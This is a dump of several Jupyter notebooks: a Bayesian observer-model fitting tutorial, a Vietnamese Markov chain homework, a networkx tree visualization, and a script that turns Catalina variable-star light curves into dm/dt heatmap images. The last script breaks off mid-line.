ax.set_xlabel('x')\n# ax.set_title('Marginalization Matrix: p(x_hat | x)')\n# ax.set_ylabel('x_hat')\n# ax.set_aspect('auto')\n\n# plt.figure(figsize=(15,15))\n# plt.plot(x, marginal)\n# plt.xlabel('x_hat')\n# plt.ylabel('probability')\n# plt.show()", "_____no_output_____" ], [ "############\n# Solution\n############\nmarginalization_matrix = np.zeros_like(posterior_matrix)\n\nmarginalization_matrix = input_matrix * binary_decision_matrix\n\nmarginal = np.sum(marginalization_matrix, axis=0)\nmarginal = marginal / np.sum(marginal)\n\nfig = plt.figure(figsize=(15,15))\nax = fig.add_subplot(111)\nax.imshow(marginalization_matrix)\nax.set_xlabel('x')\nax.set_title('Marginalization Matrix: p(x_hat | x)')\nax.set_ylabel('x_hat')\nax.set_aspect('auto')\n\nplt.figure(figsize=(15,15))\nplt.plot(x, marginal)\nplt.xlabel('x_hat')\nplt.ylabel('probability')\nplt.title('Marginal : p(x_hat |x)')\nplt.show()", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 6: Generate some Data\n\nNow that we've seen how to calculate the posterior and marginalize to get $p(\\hat{x} \\mid x)$ we will generate some artificial data for a single participant using the `generate_data()` function provided, and mixing parameter $\\alpha$ = 0.1\n\nPlease run the code below:", "_____no_output_____" ] ], [ [ "def generate_data(x_stim, alpha):\n \"\"\"\n DO NOT EDIT THIS FUNCTION !!!\n\n Returns the mean, median and mode of an arbitrary function\n\n Args : \n x_stim (numpy array of floats) - x values at which stimuli are presented\n alpha (scalar) - mixture component for the Mixture of Gaussian prior\n\n Returns:\n (numpy array of floats): x_hat response of participant for each stimulus\n \"\"\"\n x = np.arange(-10,10,0.1)\n x_hat = np.zeros_like(x_stim)\n\n prior_mean = 0\n prior_sigma1 = .5\n prior_sigma2 = 3\n prior1 = my_gaussian(x, prior_mean, prior_sigma1)\n prior2 = my_gaussian(x, prior_mean, prior_sigma2)\n\n prior_combined = (1-alpha) * prior1 + (alpha * prior2) \n prior_combined = prior_combined / np.sum(prior_combined)\n\n for i_stim in np.arange(x_stim.shape[0]):\n likelihood_mean = x_stim[i_stim]\n likelihood_sigma = 1\n likelihood = my_gaussian(x, likelihood_mean, likelihood_sigma)\n likelihood = likelihood / np.sum(likelihood)\n\n posterior = np.multiply(prior_combined, likelihood)\n posterior = posterior / np.sum(posterior)\n \n # Assumes participant takes posterior mean as 'action'\n x_hat[i_stim] = np.sum(x * posterior)\n return x_hat\n\nrandom.seed(0)\n\n# Generate data for a single participant\ntrue_stim = np.array([-8, -4, -3, -2.5, -2, -1.5, -1, -0.5, 0, 0.5, 1, 1.5, 2, 2.5, 3, 4, 8])\nbehaviour = generate_data(true_stim, 0.1)\n\n# Plot of data\nplt.figure(figsize=(8,6))\nplt.plot(true_stim, true_stim - behaviour, '-k', linewidth=2, label='data')\nplt.legend()\nplt.xlabel('Position of true visual stimulus (cm)')\nplt.ylabel('Participant deviation from true stimulus (cm)');", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 7: Model fitting to generated data\n\nNow that we have generated some data and that we have seen how to calculate the posterior and marginalize to get $p(\\hat{x} \\mid x)$ we will attempt to recover the parameter alpha = 0.05 that was use to generate the data.\n\nWe have provided you with an incomplete function called `my_Bayes_model_mse()` that needs to be completed to perform the same computations you have performed in the previous exercises but over all the participant's trial, as opposed to a single trial.\n\nThe Likelihood, has already been constructed and will not change since they depend on hypothetical stimuli. We will however have to implement the Prior matrix since it depends on $\\alpha$ as well as recomputing the Posterior, Input and the marginalization matrix to compute the marginal in order to get $p(\\hat{x} \\mid x)$. Using $p(\\hat{x} \\mid x)$, we can then compute the negative Log-Likelihood for each trial in order to find the parameter that minimizes the negative Log-Likelihood (i.e. Maximises the Log-Likelihood).\n\nTrials are assumed to be independent from one another. Mathematically this means that we can define the negative Log-Likelihood as:\n\n\n\\begin{eqnarray}\n -LL = - \\sum_i \\log p(\\hat{x_i} \\mid x_i)\n\\end{eqnarray}\n\nwhere $\\hat{x_i}$ is the participant's response for trial $i$, with presented stimulus $x_i$ \n\n**Suggestions**\n\n* Complete the function my_Bayes_model_mse, to calculate the Prior, Posterior,Input and Marginalization matrix on each trial\n* Compute the marginal using the marginalization matrix on each trial\n* Compute the negative log likelihood using the marginal and the participant's response\n* Using the code snippet commented out in your script to loop over possible values of $\\alpha$\n* Bonus question : Use the optimization function `minimize` to find the optimal value of $\\alpha$.\n - Note how the limitations of numerical integration create artifacts on your marginal and the resulting negative Log-likelihood", "_____no_output_____" ] ], [ [ "def my_Bayes_model_mse(params):\n \"\"\"\n Function fits the Bayesian model from Tutorial 3 \n \n Args : \n params (list of positive floats): parameters used by the model (params[0] = posterior scaling)\n \n Returns :\n (scalar) negative log-likelihood :sum of log probabilities\n \"\"\"\n \n\n trial_ll = np.zeros_like(true_stim)\n\n ###############################################################################\n ## Insert your code here to:\n ## Compute the Prior matrix given `alpha`\n ## Compute the Posterior matrix\n ## Compute the Binary decision matrix\n ###############################################################################\n\n # Loop over stimuli\n for i_stim in np.arange(true_stim.shape[0]):\n \n ###############################################################################\n ## Insert your code here to:\n ## Compute the Input matrix \n ## Compute the Marginalization matrix\n ## Compute the Marginal\n ## Compute and return the negative log likelihood of the participant\n ###############################################################################\n raise NotImplementedError(\"You need to complete this function!\")\n\nx = np.arange(-10,10,0.1)\n\n# Plot neg-LogLikelihood for different values of alpha\nalpha_tries = np.arange(0.01,0.3,0.01)\nnll = np.zeros_like(alpha_tries)\nfor i_try in np.arange(alpha_tries.shape[0]):\n nll[i_try] = my_Bayes_model_mse(np.array([alpha_tries[i_try]]))\n\nplt.figure(2)\nplt.plot(alpha_tries, nll)\nplt.xlabel('alpha value')\nplt.ylabel('negative log-likelihood')\nplt.axvline(alpha_tries[np.argmin(nll)])\nplt.show()\nprint(f\"Best parameters estimated, scaling parameter alpha: {alpha_tries[np.argmin(nll)]:.2f}\")\n\n# Parameters for optimization\nx0 = [0.05] # Initial guess for parameters\nbounds = [(0.01,1)] # Optimization bounds\n\n# result = minimize(...)\n# print(f\"Best parameters estimated using minimization function, scaling parameter alpha: {result.x[0]:.2f}\")", "_____no_output_____" ], [ "############\n# Solution\n############\ndef my_Bayes_model_mse(params):\n \"\"\"\n Function fits the Bayesian model from Tutorial 3 \n \n Args : \n params (list of positive floats): parameters used by the model (params[0] = posterior scaling)\n \n Returns :\n (scalar) negative log-likelihood :sum of log probabilities\n \"\"\"\n trial_ll = np.zeros_like(true_stim)\n\n ## Create the prior Matrix outside of trial loop\n alpha=params[0]\n prior_mean = 0\n prior_sigma1 = 0.5\n prior_sigma2 = 3\n prior1 = my_gaussian(x, prior_mean, prior_sigma1)\n prior2 = my_gaussian(x, prior_mean, prior_sigma2)\n prior_combined = (1-alpha) * prior1 + (alpha * prior2) \n prior_combined = prior_combined / np.sum(prior_combined)\n prior_matrix = np.tile(prior_combined, hypothetical_stim.shape[0]).reshape((hypothetical_stim.shape[0],-1))\n\n ## Create posterior matrix outside of trial loop\n posterior_matrix = np.zeros_like(likelihood_matrix)\n for i_posterior in np.arange(posterior_matrix.shape[0]):\n posterior_matrix[i_posterior,:] = np.multiply(prior_matrix[i_posterior,:], likelihood_matrix[i_posterior,:])\n posterior_matrix[i_posterior,:] = posterior_matrix[i_posterior,:] / np.sum(posterior_matrix[i_posterior,:])\n\n ## Create Binary decision matrix outside of trial loop\n binary_decision_matrix = np.zeros_like(posterior_matrix)\n for i_posterior in np.arange(posterior_matrix.shape[0]):\n mean, _, _ = moments_myfunc(x, posterior_matrix[i_posterior,:])\n idx = np.argmin(np.abs(x - mean))\n binary_decision_matrix[i_posterior,idx] = 1 \n\n # Loop over stimuli\n for i_stim in np.arange(true_stim.shape[0]):\n input_matrix = np.zeros_like(posterior_matrix)\n for i in np.arange(x.shape[0]):\n input_matrix[:, i] = my_gaussian(hypothetical_stim, true_stim[i_stim], 1)\n input_matrix[:, i] = input_matrix[:, i] / np.sum(input_matrix[:, i])\n\n marginalization_matrix = input_matrix * binary_decision_matrix\n\n marginal = np.sum(marginalization_matrix, axis=0)\n marginal = marginal / np.sum(marginal)\n\n action = behaviour[i_stim]\n idx = np.argmin(np.abs(x - action))\n\n trial_ll[i_stim] = np.log(marginal[idx] + np.finfo(float).eps)\n\n neg_ll = -np.sum(trial_ll)\n\n return neg_ll\n\nx = np.arange(-10,10,0.1)\n\n# Plot neg-LogLikelihood for different values of alpha\nalpha_tries = np.arange(0.01,0.3,0.01)\nnll = np.zeros_like(alpha_tries)\nfor i_try in np.arange(alpha_tries.shape[0]):\n nll[i_try] = my_Bayes_model_mse(np.array([alpha_tries[i_try]]))\n\nplt.figure(2)\nplt.plot(alpha_tries, nll)\nplt.xlabel('alpha value')\nplt.ylabel('negative log-likelihood')\nplt.axvline(alpha_tries[np.argmin(nll)])\nplt.show()\nprint(f\"Best parameters estimated, scaling parameter alpha: {alpha_tries[np.argmin(nll)]:.2f}\")\n\n# Parameters for optimization\nx0 = [0.05] # Initial guess for parameters\nbounds = [(0.01,1)] # Optimization bounds\n\nresult = minimize(my_Bayes_model_mse, x0, method='SLSQP', bounds=bounds)\nprint(f\"Best parameters estimated using minimization function, scaling parameter alpha: {result.x[0]:.2f}\")", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
e72fe77ceb950d6f1ca25c0d9ffcf9df68014a44
8,680
ipynb
Jupyter Notebook
assignment/.ipynb_checkpoints/Assignment_4.2-checkpoint.ipynb
jurgendn/processviz
82808a92662962f04c48673c9cf159d7bc904ff7
[ "BSD-3-Clause" ]
null
null
null
assignment/.ipynb_checkpoints/Assignment_4.2-checkpoint.ipynb
jurgendn/processviz
82808a92662962f04c48673c9cf159d7bc904ff7
[ "BSD-3-Clause" ]
null
null
null
assignment/.ipynb_checkpoints/Assignment_4.2-checkpoint.ipynb
jurgendn/processviz
82808a92662962f04c48673c9cf159d7bc904ff7
[ "BSD-3-Clause" ]
2
2020-03-19T11:14:13.000Z
2021-08-14T14:24:08.000Z
29.726027
665
0.454378
[ [ [ "**Nguyễn Tiến Dũng**\n\n20170062\n\nKSTN Toán Tin - K62\n\n*Đại học Bách khoa Hà Nội*", "_____no_output_____" ] ], [ [ "import processviz as pvz", "[[1.61486158 1.02476931 0.63137445 0.36911122 0.19426906 0.07770763]\n [1.53715396 2.56192326 1.57843613 0.92277805 0.48567266 0.19426906]\n [1.42059252 2.3676542 2.99902865 1.75327829 0.92277805 0.36911122]\n [1.24575036 2.07625061 2.62991744 2.99902865 1.57843613 0.63137445]\n [0.98348713 1.63914522 2.07625061 2.3676542 2.56192326 1.02476931]\n [0.59009228 0.98348713 1.24575036 1.42059252 1.53715396 1.61486158]]\n['2', '3', '4', '5', '6', '7']\n[[ 3.91209325]\n [ 7.28023312]\n [ 9.83244293]\n [11.16075765]\n [10.65322972]\n [ 7.39193783]]\n" ] ], [ [ "**Câu 1:**\n\nĐầu tiên, dễ thấy $(X_n)$ là một xích Markov.\n\nTa tìm ma trận xác suất chuyển của xích:\n$$\nP = \\left(\\begin{matrix}0& \\frac{1}{2} & 0 & \\frac{1}{2}\\\\\\frac{1}{2} & 0 & \\frac{1}{2} & 0 \\\\0& \\frac{1}{2} & 0 & \\frac{1}{2}\\\\\\frac{1}{2} & 0 & \\frac{1}{2} & 0\\end{matrix}\\right)\n$$\n*a.* Dễ thấy xích Markov trên là tối giản.\n\nCác trang thái có chu kì là", "_____no_output_____" ] ], [ [ "G1 = pvz.MarkovChain()\nG1.from_file('./ass4.2/input_1.csv')\nG1.classify_state()", "_____no_output_____" ] ], [ [ "*b.*Gọi 1 dãy các bước đi ngẫu nhiên của con châu chấu là $(x_0,...,x_{100})$. Dễ thây để con châu chấu trở lại $x_0$ sau đúng 100 bước thì cần có $x_0 = x_{100}$ và $x_i \\ne x_0,\\forall i = \\overline{1,99}$. \n\nTa có $x_0 = 0$. Điều này dẫn đến $x_1 = 2$. Tại thời điểm $2n$ thấy rằng $x_{2n} \\in \\{1,3\\}$ và $x_{2n+1} = 2$. Do đó số trường hợp để con châu chấu quay trở lại điểm xuất phát sau 100 bước là $\\frac{1}{2^{50}}$. ", "_____no_output_____" ], [ "---\n\n**Câu 2:** Gọi $(X_n)$ là trạng thái của đồng xu tại lần tung thứ $n, n \\ge 0$. Hiển nhiên $(X_n)$ là một xích Markov.\n\nXét $Y_n = (X_n, X_{n+1}, X_{n+2})$. Ta chứng minh $(Y_n)$ là một xích Markov.\n\nThật vậy, ta có \n$$\n\\begin{aligned}P(Y_{n+1} = y_{n+1}|Y_{n} = y_n) &= P[(X_n, X_{n+1}, X_{n+2}) = (i_n, j_{n+1}, k_{n+2})|(X_{n-1}, X_n, X_{n+1}) = (i_{n-1}, j_{n}, k_{n+1})] \\\\&= P[X_n, X_{n+1}, X_{n+2} = i_n, j_{n+1}, k_{n+2}|X_{n-1}, X_n, X_{n+1} = i_{n-1}, j_{n}, k_{n+1}]\\label{eq1}\\end{aligned}\n$$\nLại có \n$$\n\\begin{aligned}&P(Y_{n+1} = y_{n+1}|Y_{n} = y_n,..,Y_0) \\\\&= P[(X_n, X_{n+1}, X_{n+2}) = (i_n, j_{n+1}, k_{n+2})|(X_{n-1}, X_n, X_{n+1}) = (i_{n-1}, j_{n}, k_{n+1}),...,(X_0, X_1, X_2) = (i_0, j_1, k_2)] \\\\&= P[X_n, X_{n+1}, X_{n+2} = i_n, j_{n+1}, k_{n+2}|X_{n-1}, X_n, X_{n+1} = i_{n-1}, j_{n}, k_{n+1},...,X_0 = i_0] \\\\& = \\frac{P(X_{n+2} = i_{n+2},...,X_0 = i_0)}{P(X_{n+1},..,X_0 = i_0)} \\\\& = \\frac{P[X_{n+2}, X_{n+1}, X_{n} = i_n, j_{n+1}, k_{n+2}|X_{n+1}, X_n, X_{n-1}]}{P[X_{n+1}, X_{n}, X_{n-1},...,X_0]} \\\\& = P[X_n, X_{n+1}, X_{n+2} = i_n, j_{n+1}, k_{n+2}|X_{n-1}, X_n, X_{n+1} = i_{n-1}, j_{n}, k_{n+1}]\\label{eq2}\\end{aligned}\n$$\nVậy từ đó ta có $(Y_n)$ là xích Markov.\n\nKhông gian trạng thái $I = \\{(x, y, z) \\in \\{S, N\\}^3 \\}$\n\nMa trận xác suất chuyển $P$ được xác định như sau:", "_____no_output_____" ] ], [ [ "G2 = pvz.MarkovChain()\nG2.from_file('./ass4.2/input_2.csv')", "_____no_output_____" ], [ "G2.get_period('NSN')", "_____no_output_____" ] ], [ [ "Vậy trung bình mất số lần tung như trên để đạt đến trạng thái $NSN$\n\n---", "_____no_output_____" ], [ "**Câu 3:**\n\nKhông gian trạng thái `I = {CS_THONGTHUONG, CS_DACBIET,CS_TANGCUONG,DONG_HOP, KHOI_BENH}`\n\nMa trận xác suất chuyển\n\n| CS_THONGTHUONG | CS_DACBIET | CS_TANGCUONG | DONG_HOP | KHOI_BENH |\n| -------------- | ---------- | ------------ | -------- | --------- |\n| 0.3 | 0.15 | 0 | 0 | 0.55 |\n| 0.2 | 0.55 | 0.1 | 0.05 | 0.1 |\n| 0.05 | 0.3 | 0.55 | 0.1 | 0 |\n| 0 | 0 | 0 | 1 | 0 |\n| 0 | 0 | 0 | 0 | 1 |\n\nPhân phối ban đầu \n\n| CS_THONGTHUONG | CS_DACBIET | CS_TANGCUONG | DONG_HOP | KHOI_BENH |\n| -------------- | ---------- | ------------ | -------- | --------- |\n| 0.6 | 0.3 | 0.1 | 0 | 0 |", "_____no_output_____" ], [ "*a.* Xác suất để một ", "_____no_output_____" ] ], [ [ "G3 = pvz.MarkovChain()\nG3.from_file('./ass4.2/input_3.csv')", "_____no_output_____" ], [ "G3.get_mean_time(source='CS_TANGCUONG', target='CS_TANGCUONG', type='transient')", "_____no_output_____" ] ], [ [ "*b.* Xác suất một bệnh nhân ở phòng ICU liên tiếp $k$ ngày là $0.55^k$\n\nDo đó số ngày trung bình để bệnh nhân đó tiếp tục phải ở lại chăm sóc tại phòng ICU là\n$$\nE(X|) = \\underset{n \\to \\infty}{lim}\\sum_{k = 1}^{n}k*0.55^k\n$$\n\nXét \n$$\n\\begin{aligned}f(x) & = \\sum_{i = 1}^{n}x^i \\\\\\Rightarrow f'(x) & = \\sum_{i = 1}^{n-1}ix^{i-1} \\\\\\Rightarrow xf'(x) & = \\sum_{i = 1}^{n-1}ix^{i}\\end{aligned}\n$$\nMặt khác lại có \n$$\n\\begin{aligned}f(x) & = \\frac{1-x^{n+1}}{1-x} \\\\\\Rightarrow f'(x) & = \\frac{1-x^{n+1}}{(1-x)^2} - \\frac{x^{n+1}(n+1)}{x(1-x)} \\\\\\Rightarrow xf'(x) & = x\\frac{1-x^{n+1}}{(1-x)^2} - \\frac{x^{n+2}(n+1)}{x(1-x)}\\end{aligned}\n$$\nDo đó\n$$\n\\begin{aligned}E(X) & = \\underset{n \\to \\infty}{lim}\\left(0.3\\frac{1-0.3^{n+1}}{(1-0.3)^2} - \\frac{0.3^{n+2}(n+1)}{0.3(1-0.3)}\\right) \\\\& = \\frac{0.55}{1-(0.55)^2} = 2.72\\end{aligned}\n$$\n", "_____no_output_____" ] ], [ [ "G4 = pvz.MarkovChain()", "_____no_output_____" ], [ "G4.from_file('./ass4.2/input_4.csv')", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ] ]
e72ff6c0c79f6dc5f8b14b01655b4a7b19da2f75
44,864
ipynb
Jupyter Notebook
tree_visualization.ipynb
luishengjie/parallel-bfs
c27b75b7d43e526876ed0716ad8faad621357e10
[ "MIT" ]
null
null
null
tree_visualization.ipynb
luishengjie/parallel-bfs
c27b75b7d43e526876ed0716ad8faad621357e10
[ "MIT" ]
null
null
null
tree_visualization.ipynb
luishengjie/parallel-bfs
c27b75b7d43e526876ed0716ad8faad621357e10
[ "MIT" ]
null
null
null
280.4
21,400
0.924394
[ [ [ "import numpy as np\nfrom src.load_graph import get_graph, gen_balanced_tree\nimport networkx as nx\nimport matplotlib.pyplot as plt", "_____no_output_____" ], [ "A = get_graph(directed=False)\nprint(A)", "[[0 1 1 0 0 0 0 0 0 0 0 0 0 0 0]\n [1 0 0 1 1 0 0 0 0 0 0 0 0 0 0]\n [1 0 0 0 0 1 1 0 0 0 0 0 0 0 0]\n [0 1 0 0 0 0 0 1 1 0 0 0 0 0 0]\n [0 1 0 0 0 0 0 0 0 1 1 0 0 0 0]\n [0 0 1 0 0 0 0 0 0 0 0 1 1 0 0]\n [0 0 1 0 0 0 0 0 0 0 0 0 0 1 1]\n [0 0 0 1 0 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 1 0 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 1 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 1 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 1 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 1 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0 0 0 0 0 0 0]]\n" ], [ "def show_graph_with_labels(adjacency_matrix):\n rows, cols = np.where(adjacency_matrix == 1)\n edges = zip(rows.tolist(), cols.tolist())\n gr = nx.Graph()\n gr.add_edges_from(edges)\n pos = nx.spring_layout(gr)\n\n nx.draw(gr, pos, node_size=300, with_labels=True)\n plt.show()\n", "_____no_output_____" ], [ "show_graph_with_labels(A)", "_____no_output_____" ], [ "A1 = gen_balanced_tree(height=3, branch=2)\nprint(A1)\nshow_graph_with_labels(A1)", "[[0 1 1 0 0 0 0 0 0 0 0 0 0 0 0]\n [1 0 0 1 1 0 0 0 0 0 0 0 0 0 0]\n [1 0 0 0 0 1 1 0 0 0 0 0 0 0 0]\n [0 1 0 0 0 0 0 1 1 0 0 0 0 0 0]\n [0 1 0 0 0 0 0 0 0 1 1 0 0 0 0]\n [0 0 1 0 0 0 0 0 0 0 0 1 1 0 0]\n [0 0 1 0 0 0 0 0 0 0 0 0 0 1 1]\n [0 0 0 1 0 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 1 0 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 1 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 1 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 1 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 1 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0 0 0 0 0 0 0]]\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code" ] ]
e72ff76df584025a3ca8cd65006c284267567c7e
16,045
ipynb
Jupyter Notebook
all_codes/dmdt_matrix_and_images_formation/merge_data_original_file_and_one_prog_for_all-ogal_data-Copy21.ipynb
shreya996/true_dat
7b31ffefb51c4db173a8fe7c29fb13f1f89579e4
[ "MIT" ]
null
null
null
all_codes/dmdt_matrix_and_images_formation/merge_data_original_file_and_one_prog_for_all-ogal_data-Copy21.ipynb
shreya996/true_dat
7b31ffefb51c4db173a8fe7c29fb13f1f89579e4
[ "MIT" ]
null
null
null
all_codes/dmdt_matrix_and_images_formation/merge_data_original_file_and_one_prog_for_all-ogal_data-Copy21.ipynb
shreya996/true_dat
7b31ffefb51c4db173a8fe7c29fb13f1f89579e4
[ "MIT" ]
null
null
null
36.218962
1,436
0.595201
[ [ [ "import pandas as pd\ndata=pd.read_csv('C:\\\\Users\\\\Shreya choudhary\\\\ecsvfile.txt', sep=\" \",names=[\"Catalina_Surveys_ID\",\"ID\",\"RA_(J2000)\",\" Dec \",\"V_(mag)\",\"Period_(days)\",\"Amplitude\",\"Number_Obs\",\"Var_Type\"])\ndata1=pd.read_csv('C:\\\\Users\\\\Shreya choudhary\\\\Downloads\\\\ttt\\\\ALLVar', sep=\",\",header=None ,names=[\"ID\",\"MJD\",\"Mag\",\"Magerr\",\"RA\",\"Dec\"])\nresult = data[['ID','Var_Type']].merge(data1[['ID','MJD','Mag']], on = 'ID',how = 'left')\nresult1=result.round({'Mag': 6})\nresult1.to_csv('merged.txt', encoding='utf-8',index=False)\n", "_____no_output_____" ], [ "import os\nimport time\nfrom sklearn.utils import shuffle\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import confusion_matrix\nimport itertools\n\nfrom lasagne import random as lasagne_random\nfrom lasagne import layers\nfrom lasagne.nonlinearities import softmax, tanh\nfrom lasagne import objectives\nfrom lasagne import updates\n\nimport theano\nimport theano.tensor as T\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")", "_____no_output_____" ], [ "(result1.loc[result1['Var_Type'] == 13]).to_csv('vartype_13_data.txt',encoding='utf-8',index=False)\n", "_____no_output_____" ], [ "import pandas as pd\ndata2=pd.read_csv('C:\\\\Users\\\\Shreya choudhary\\\\vartype_13_data.txt')\ndata3 = data2.groupby('ID')\ndata3.apply(lambda x: x.to_csv('ID' + str(x.name) + '.txt',index=False,header=None))", "_____no_output_____" ], [ "import pandas as pd\nimport glob\nimport numpy as np\n\n#l = [pd.read_csv(filename) for filename in glob.glob(\"C:\\\\Users\\\\Shreya choudhary\\\\variable type\\\\*.txt\")]\n\n\n#file_list = glob.glob(\"/home/dic/jupyter/var4_txtfiles\" + \"/*.txt\") #Get folder path containing text files\n\n#print(file_list)\nd=1\n#for file_path in file_list:\n #print(file_path)\nID,Var_Type,MJD,Mag=np.loadtxt(\"/home/dic/jupyter/var4_txtfiles/ID1001006032764.txt\", unpack=True, delimiter=',')\nc=[]\ne=[]\nfor i in range(0,len(Mag)):\n for j in range(i+1,len(Mag)):\n c.append(Mag[i]-Mag[j])\n #print(c) \nfor i in range(0,len(MJD)):\n for j in range(i+1,len(MJD)):\n e.append(MJD[j]-MJD[i])\n #print(e)\ns1 = pd.Series(c, name='dm_y')\n\ns2 = pd.Series(e,name='dt_x')\n\n\n\n#Assigning bins to all dmdt values\n\nbins=[-8,-5,-3,-2.5,-2,-1.5,-1,-0.5,-0.3,-0.2,-0.1,0,0.1,0.2,0.3,0.5,1,1.5,2,2.5,3,5,8]\n#bins1=[0,10,20,30,40,50,60,70,80,90,100,110,120,130,140,150,160,170,180,190,200,210,220,230,240,250,260,270,280,290,300,310,320,330,340,350,360,370,380,390,400,410,420,430,440,450,460,470,480,490,500,510,520,530,540,550,560,570,580,590,600,610,620,630,640,650,660,670,680,690,700,710,720,730,740,750,760,770,780,790,800,810,820,830,840,850,860,870,880,890,900,910,920,930,940,950,960,970,980,990,1000,1010,1020,1030,1040,1050,1060,1070,1080,1090,1100,1110,1120,1130,1140,1150,1160,1170,1180,1190,1200,1210,1220,1230,1240,1250,1260,1270,1280,1290,1300,1310,1320,1330,1340,1350,1360,1370,1380,1390,1400,1410,1420,1430,1440,1450,1460,1470,1480,1490,1500,1510,1520,1530,1540,1550,1560,1570,1580,1590,1600,1610,1620,1630,1640,1650,1660,1670,1680,1690,1700,1710,1720,1730,1740,1750,1760,1770,1780,1790,1800,1810,1820,1830,1840,1850,1860,1870,1880,1890,1900,1910,1920,1930,1940,1950,1960,1970,1980,1990,2000,2010,2020,2030,2040,2050,2060,2070,2080,2090,2100,2110,2120,2130,2140,2150,2160,2170,2180,2190,2200,2210,2220,2230,2240,2250,2260,2270,2280,2290,2300,2310,2320,2330,2340,2350,2360,2370,2380,2390,2400,2410,2420,2430,2440,2450,2460,2470,2480,2490,2500,2510,2520,2530,2540,2550,2560,2570,2580,2590,2600,2610,2620,2630,2640,2650,2660,2670,2680,2690,2700,2710,2720,2730,2740,2750,2760,2770,2780,2790,2800,2810,2820,2830,2840,2850,2860,2870] #bins of x axis\nbins1=[1/145,2/145,3/145,4/145,1/25,2/25,3/25,1.5,2.5,3.5,4.5,5.5,7,10,20,30,60,90,120,240,600,960,2000,4000]\nreturn_bins_of_s2= np.digitize(s2, bins1) # np.digitize gives the bin number to which a particular value of dm, dt belongs to.\nreturn_bins_of_s1 = np.digitize(s1, bins)\nybins = pd.Series(return_bins_of_s1, name='ybin')\nxbins = pd.Series(return_bins_of_s2, name='xbin')\n\ndmdt=pd.concat([s1, s2,ybins,xbins], axis=1)\n#print(dmdt)\n\n\n# exclude all the values from dataframe dmdt that are outside the bin boundries i.e. bin number 0, 23 and 24\n#dmdt=dmdt[dmdt.ybin != 23]\n#dmdt=dmdt[dmdt.xbin != 0]\n#dmdt=dmdt[dmdt.ybin != 0]\n#dmdt=dmdt[dmdt.xbin != 5]\n\n\ndmdt['bins_xaxis']=pd.cut(dmdt['dt_x'],bins1) #pd.cut gives range of bin for all dt_x values \ndmdt['bins_yaxis']=pd.cut(dmdt['dm_y'],bins)\n\n\ndmdt['merged_dmdt']= dmdt.dm_y.map(str) + ',' + dmdt.dt_x.map(str)\ndmdt['dmdt_bin_number']= dmdt.ybin.map(str) + ',' + dmdt.xbin.map(str)\n\ndmdt.dropna() # drops all the values with NaN in dataframe dmdt\n #print(dmdt)\n \n\ndmdtpairs=len(dmdt.dm_y) # number of dmdtpairs for a light curve of length n that falls under the given bin range\n #print(dmdtpairs)\n\n\n#grouping and counting all the values that fall in all individual bins\ndf=dmdt.groupby('dmdt_bin_number',sort=False).merged_dmdt.agg(['count']) #counts how many merged_dmdt benlongs to each 'dmdt_bin_number' range\n#print(df)\n#df.hist(bin=4)\ndf.to_csv('/home/dic/jupyter/count155.txt',encoding='utf-8')\n\ndata_count=pd.read_csv('/home/dic/jupyter/count155.txt')\n\nldf=dmdt.set_index('dmdt_bin_number').join(data_count.set_index('dmdt_bin_number'))\n\nabcc=ldf.dropna()\nfinal=abcc.drop_duplicates(['ybin','xbin']) # drops all the rows where both of values of ybin and xbin are duplicate\nfinal1=final.drop(['bins_xaxis','bins_yaxis','merged_dmdt'],axis=1)\n #print(final1)\nfinal1.to_csv('/home/dic/jupyter/final_table1155.txt',encoding='utf-8',header=None,index=False)\n\n \ndm,dt,xbin,ybin,count=np.loadtxt('/home/dic/jupyter/final_table1155.txt',unpack=True,delimiter=',',dtype=\"i\")\n\n# assignig intensity values to each bin. Bins are in the form of 23x24 numpy array\n\naa = np.zeros(shape=(23,24))\nfor gg in range(0,len(xbin)):\n \n l1=xbin[gg]\n m1=ybin[gg]\n o1=count[gg]\n i1=(255 * o1)/(dmdtpairs + 0.99999)\n print(i1)\n aa[l1-1,m1-1]=i1\n \n #print (aa) \n \nimport seaborn as sns\nsns.set()\nimport cv2\nimport matplotlib.pyplot as plt\n#sns.distplot(aa, kde=False, rug=True)\nimage11=sns.heatmap(aa,cmap='jet',vmin=0, vmax=255,cbar=False,square=True,xticklabels=False, yticklabels=False)\n#,square=False,xticklabels=True, yticklabels=True\n#image11=sns.heatmap(aa,xticklabels=False, yticklabels=False)\n#vmin=0, vmax=255,\n#cmap='RdYlBu'// colormap of heatmap\n#sns_plot.figure.savefig(\"output.png\")\n #, bbox_inches = 'tight',pad_inches = 0\nimage11.figure.savefig(\"/home/dic/jupyter/image_var4_dt_elongated\"+\"/gg%d.png\" %d, bbox_inches = 'tight',pad_inches = 0)\n 